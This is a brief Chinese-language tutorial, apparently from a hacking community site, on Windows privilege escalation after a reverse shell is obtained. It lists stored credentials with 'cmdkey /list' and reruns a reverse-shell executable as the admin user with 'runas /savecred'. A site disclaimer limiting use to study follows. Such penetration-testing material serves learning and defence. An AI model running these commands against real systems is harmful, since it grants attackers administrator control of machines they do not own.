通过存储凭证提升权限
RunAs 通过存储凭证提升权限
在目标主机传shell弹回来后,我们应该立即开始执行手动枚举,以便在我们开始使用工具之前更好地了解我们正在使用的是什么。 这挺重要,因为搜索存储的凭据应该是获得据点前首先执行的手动命令之一。
手动枚举存储的凭据
查找存储的凭据可以使用一个简单的命令来完成:
cmdkey /list
这里我们可以看到本地Admin账户的凭证已经存储,可以用来执行命令。
通过使用保存的凭据作为管理员用户运行shell提权
runas /savecred /user:admin C:\PrivEsc\reverse.exe免责声明:
H4K6技术社区所提供的一切软件、教程、漏洞信息、破解补丁、注册机、注册信息及软硬件解密分析文章等仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请自行承担。H4K6技术社区不承担任何因为技术滥用所产生的连带责任。H4K6技术社区所有发布的信息资源来源于互联网,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
